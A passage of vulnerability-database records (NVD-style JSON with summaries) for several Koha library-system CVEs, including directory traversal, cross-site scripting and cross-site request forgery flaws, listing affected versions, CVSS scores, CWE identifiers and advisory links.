        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-01-24T17:15:12.407",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/security-release-february-2014/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/security-release-february-2014/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2020-01-24 17:15
Modified
2024-11-21 02:05
Summary
Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors.
Impacted products
Vendor Product Version
koha koha *
koha koha *
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "217F4C5D-055C-43AA-983A-51CF9408B213",
              "versionEndExcluding": "3.08.23",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9D66E4EE-C4FC-411F-957B-F21A618EBC7E",
              "versionEndExcluding": "3.10.13",
              "versionStartIncluding": "3.10.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "173A2792-F4A9-4378-9CA7-6FAE08D75492",
              "versionEndExcluding": "3.12.10",
              "versionStartIncluding": "3.12.00",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DE8FEB3-A97F-4F8C-A5FC-4B70E6E08859",
              "versionEndExcluding": "3.14.03",
              "versionStartIncluding": "3.14.00",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Multiple directory traversal vulnerabilities in the (1) staff interface help editor (edithelp.pl) or (2) member-picupload.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allow remote attackers to write to arbitrary files via unspecified vectors."
    },
    {
      "lang": "es",
      "value": "M\u00faltiples vulnerabilidades de Salto de Directorio en el (1) editor de ayuda de la interfaz del personal (archivo edithelp.pl) o (2) el archivo member-picupload.pl en Koha versiones anteriores a 3.8.23, versiones 3.10.x anteriores a 3.10.13, versiones 3.12.x anteriores a 3.12.10, y versiones 3.14.x anteriores a 3.14.3, permiten a atacantes remotos escribir en archivos arbitrarios por medio de vectores no especificados."
    }
  ],
  "id": "CVE-2014-1923",
  "lastModified": "2024-11-21T02:05:16.930",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 5.0,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 3.6,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2020-01-24T17:15:12.250",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/security-release-february-2014/"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "http://koha-community.org/security-release-february-2014/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Mailing List",
        "Third Party Advisory"
      ],
      "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-22"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2018-09-06 19:29
Modified
2024-11-21 03:40
Summary
KOHA Library System versions 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contain a Cross-Site Scripting (XSS) vulnerability in multiple fields on multiple pages, including /cgi-bin/koha/acqui/supplier.pl?op=enter, /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number], and /cgi-bin/koha/serials/subscription-add.pl, that can result in privilege escalation by taking control of higher-privileged users' browser sessions. The attack appears to be exploitable when a victim is socially engineered into visiting a vulnerable webpage containing a malicious payload. This vulnerability appears to have been fixed in 17.11.
Impacted products
Vendor Product Version
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3248F696-8686-4093-94DE-2D30EBE76239",
              "versionEndIncluding": "16.11.13",
              "versionStartIncluding": "16.11.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "20CF4C18-0421-40BA-BAFD-712040BE657A",
              "versionEndIncluding": "17.05.05",
              "versionStartIncluding": "17.05.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Scripting (XSS) vulnerability in Multiple fields on multiple pages including /cgi-bin/koha/acqui/supplier.pl?op=enter , /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] , /cgi-bin/koha/serials/subscription-add.pl that can result in Privilege escalation by taking control of higher privileged users browser sessions. This attack appear to be exploitable via Victims must be socially engineered to visit a vulnerable webpage containing malicious payload. This vulnerability appears to have been fixed in 17.11."
    },
    {
      "lang": "es",
      "value": "KOHA Library System en versiones 16.11.x (hasta la 16.11.13) y versiones 17.05.x (hasta la 17.05.05) contiene una vulnerabilidad Cross-Site Scripting (XSS) en m\u00faltiples campos de m\u00faltiples p\u00e1ginas, incluyendo /cgi-bin/koha/acqui/supplier.pl?op=enter, /cgi-bin/koha/circ/circulation.pl?borrowernumber=[number] y /cgi-bin/koha/serials/subscription-add.pl. Esto puede resultar en un escalado de privilegios obteniendo el control de las sesiones de navegaci\u00f3n de usuarios con mayores privilegios. El ataque parece ser explotable si la v\u00edctima es enga\u00f1ada mediante ingenier\u00eda social para que visite una p\u00e1gina web vulnerable que contiene una carga \u00fatil maliciosa. La vulnerabilidad parece haber sido solucionada en la versi\u00f3n 17.11."
    }
  ],
  "id": "CVE-2018-1000670",
  "lastModified": "2024-11-21T03:40:22.397",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "NONE",
          "baseScore": 4.3,
          "confidentialityImpact": "NONE",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 2.9,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "NONE",
          "baseScore": 6.1,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "LOW",
          "integrityImpact": "LOW",
          "privilegesRequired": "NONE",
          "scope": "CHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.7,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-09-06T19:29:00.627",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19086"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-79"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2018-09-06 19:29
Modified
2024-11-21 03:40
Summary
KOHA Library System versions 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contain a Cross-Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl (affected parameters: borrowernumber, amount, amountoutstanding, paid) that can allow attackers to mark payments as paid for certain users on behalf of administrators. The attack appears to be exploitable when the victim is socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11.
References
Impacted products
Vendor Product Version
koha koha *
koha koha *



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "3248F696-8686-4093-94DE-2D30EBE76239",
              "versionEndIncluding": "16.11.13",
              "versionStartIncluding": "16.11.0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "20CF4C18-0421-40BA-BAFD-712040BE657A",
              "versionEndIncluding": "17.05.05",
              "versionStartIncluding": "17.05.0",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "KOHA Library System version 16.11.x (up until 16.11.13) and 17.05.x (up until 17.05.05) contains a Cross Site Request Forgery (CSRF) vulnerability in /cgi-bin/koha/members/paycollect.pl Parameters affected: borrowernumber, amount, amountoutstanding, paid that can result in Attackers can mark payments as paid for certain users on behalf of Administrators. This attack appear to be exploitable via The victim must be socially engineered into clicking a link, usually via email. This vulnerability appears to have been fixed in 17.11."
    },
    {
      "lang": "es",
      "value": "KOHA Library System en versiones 16.11.x (hasta la 16.11.13) y versiones 17.05.x (hasta la 17.05.05) contiene una vulnerabilidad Cross Site Request Forgery (CSRF) en /cgi-bin/koha/members/paycollect.pl. Los par\u00e1metros afectados son: borrowernumber, amount, amountoutstanding y paid. Esto puede resultar en que los atacantes puedan marcar pagos como \"pagados\" para ciertos usuarios en nombre de los administradores. El ataque parece ser explotable si la v\u00edctima es enga\u00f1ada mediante ingenier\u00eda social para que haga clic en un enlace, normalmente por email. La vulnerabilidad parece haber sido solucionada en la versi\u00f3n 17.11."
    }
  ],
  "id": "CVE-2018-1000669",
  "lastModified": "2024-11-21T03:40:22.230",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2018-09-06T19:29:00.503",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Issue Tracking",
        "Patch",
        "Vendor Advisory"
      ],
      "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=19117"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2017-07-21 14:29
Modified
2025-04-20 01:37
Summary
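Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name. Note that the record below classifies the weakness as CWE-352 (cross-site request forgery) rather than CWE-79, so triage or filtering keyed on the CWE field alone will not surface this entry as XSS.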
Impacted products
Vendor Product Version
koha koha 3.14.00
koha koha 3.14.00
koha koha 3.14.00
koha koha 3.14.00
koha koha 3.14.01
koha koha 3.14.02
koha koha 3.14.03
koha koha 3.14.04
koha koha 3.14.05
koha koha 3.14.06
koha koha 3.14.07
koha koha 3.14.08
koha koha 3.14.09
koha koha 3.14.10
koha koha 3.14.11
koha koha 3.14.12
koha koha 3.14.13
koha koha 3.14.14
koha koha 3.14.15
koha koha 3.16.00
koha koha 3.16.00
koha koha 3.16.00
koha koha 3.16.00
koha koha 3.16.01
koha koha 3.16.02
koha koha 3.16.03
koha koha 3.16.04
koha koha 3.16.05
koha koha 3.16.06
koha koha 3.16.07
koha koha 3.16.08
koha koha 3.16.09
koha koha 3.16.10
koha koha 3.16.11
koha koha 3.20.00
koha koha 3.20.00



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.00:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B1B2C12-B1D5-4E52-858C-0B4F8E1BA02C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.00:alpha1:*:*:*:*:*:*",
              "matchCriteriaId": "E450C73D-31D6-4BDF-ABB0-FBB15492EA3F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.00:alpha2:*:*:*:*:*:*",
              "matchCriteriaId": "A32E9045-72AD-4659-B62A-2900EA460E91",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.00:beta:*:*:*:*:*:*",
              "matchCriteriaId": "BC44DA27-4C55-4EE8-BA43-2BEC87DB3FED",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.01:*:*:*:*:*:*:*",
              "matchCriteriaId": "EC10597A-43BC-4CC1-816A-EBB2CFD11FE5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.02:*:*:*:*:*:*:*",
              "matchCriteriaId": "A36ADA58-0554-4CA7-A99A-FA9EBB9A9FF9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.03:*:*:*:*:*:*:*",
              "matchCriteriaId": "D2CE5A96-7210-4911-A06F-F1AACF0F4C6E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.04:*:*:*:*:*:*:*",
              "matchCriteriaId": "06635AE0-F61A-4599-BE50-6E3642308FDC",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.05:*:*:*:*:*:*:*",
              "matchCriteriaId": "2B17348C-4474-4F39-8399-F8558E4E3C22",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.06:*:*:*:*:*:*:*",
              "matchCriteriaId": "72C16BBA-615E-4FD9-9D78-AA8879A3B7F0",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.07:*:*:*:*:*:*:*",
              "matchCriteriaId": "782C4424-4929-4B36-AF27-72F6AF5314C2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.08:*:*:*:*:*:*:*",
              "matchCriteriaId": "3B779311-23F0-4D2A-88AD-2434831F2664",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.09:*:*:*:*:*:*:*",
              "matchCriteriaId": "A04BD9B6-4820-4713-86C1-332A2402DB66",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "B8661D5D-A7BB-4370-83F6-C25F4F343875",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "2B63D59F-E9FB-4B4B-BE3D-0D5B4042C0D9",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.12:*:*:*:*:*:*:*",
              "matchCriteriaId": "B55D4B73-6F7D-4FDE-AD7D-918D3839677B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.13:*:*:*:*:*:*:*",
              "matchCriteriaId": "A9032F10-0CCD-49C4-B336-5657E501FCD5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F5EB1BA-F905-4F12-9AE4-577A9F08D48E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.14.15:*:*:*:*:*:*:*",
              "matchCriteriaId": "5FAC17B4-2903-4BAA-B3A9-5DDD8DC37647",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.00:*:*:*:*:*:*:*",
              "matchCriteriaId": "D077FDF3-B2BE-44DC-8473-6B0C1DE6B68D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.00:beta:*:*:*:*:*:*",
              "matchCriteriaId": "E9B749AC-8BD2-4668-85F0-5E20E7F5A820",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.00:pkg:*:*:*:*:*:*",
              "matchCriteriaId": "1CBB8838-C0D6-4BA5-9C03-50BEFB8636DB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.00:rc:*:*:*:*:*:*",
              "matchCriteriaId": "06C2A6E3-F6BC-4A48-BC44-95426DBD82D2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.01:*:*:*:*:*:*:*",
              "matchCriteriaId": "89B1D91F-56DA-4C7A-BE59-0CB88608C675",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.02:*:*:*:*:*:*:*",
              "matchCriteriaId": "EB6206E8-DFA3-40DC-9C46-A4322829656C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.03:*:*:*:*:*:*:*",
              "matchCriteriaId": "979FE2FA-59C5-439A-BA73-898270752FEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.04:*:*:*:*:*:*:*",
              "matchCriteriaId": "6D6540C8-91C9-4FA2-8422-2B9A7C8EC28F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.05:*:*:*:*:*:*:*",
              "matchCriteriaId": "77B040B5-B0CD-4BC8-ACBF-8A0DE6BA5060",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.06:*:*:*:*:*:*:*",
              "matchCriteriaId": "BE2EC9D9-045D-439F-9AA4-966C9144C38D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.07:*:*:*:*:*:*:*",
              "matchCriteriaId": "63CF6430-EB39-4732-AD38-4644676629C7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.08:*:*:*:*:*:*:*",
              "matchCriteriaId": "2BC1D87F-FECB-42AB-A2EF-07CBBE1177E5",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.09:*:*:*:*:*:*:*",
              "matchCriteriaId": "7229A6EE-B88C-497F-817F-9B1F8D5E3246",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.10:*:*:*:*:*:*:*",
              "matchCriteriaId": "EEDBB2C2-7153-4917-AE40-DC53DBFE9EFF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.16.11:*:*:*:*:*:*:*",
              "matchCriteriaId": "0797657C-570C-47F7-9C77-4E7DF864DDB2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.20.00:*:*:*:*:*:*:*",
              "matchCriteriaId": "6FCCFB3F-92E1-4C1E-8794-FD23A4DE6D59",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:a:koha:koha:3.20.00:beta:*:*:*:*:*:*",
              "matchCriteriaId": "74008064-906E-4674-8406-70C91A0AEAE5",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ]
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Cross-site scripting (XSS) vulnerability in opac-addbybiblionumber.pl in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, and 3.20.x before 3.20.1 allows remote attackers to inject arbitrary web script or HTML via a crafted list name."
    },
    {
      "lang": "es",
      "value": "Hay una vulnerabilidad de tipo Cross-Site Scripting (XSS) en la biblioteca opac-addbybiblionumber.pl en Koha versi\u00f3n 3.14.x anterior a  3.14.16, versi\u00f3n 3.16.x anterior a 3.16.12 y versi\u00f3n 3.20.x anterior a 3.20.1, permite a los atacantes remotos inyectar script web o HTML arbitrario por medio de un nombre de lista creado."
    }
  ],
  "id": "CVE-2015-4639",
  "lastModified": "2025-04-20T01:37:25.860",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "MEDIUM",
        "cvssData": {
          "accessComplexity": "MEDIUM",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 6.8,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 8.6,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": true
      }
    ],
    "cvssMetricV30": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "REQUIRED",
          "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version": "3.0"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2017-07-21T14:29:00.710",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "cve@mitre.org",
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Issue Tracking",
        "Third Party Advisory"
      ],
      "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14416#c4"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://koha-community.org/koha-3-14-16-released/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://koha-community.org/security-release-koha-3-16-12/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "url": "https://koha-community.org/security-release-koha-3-20-1/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Deferred",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-352"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

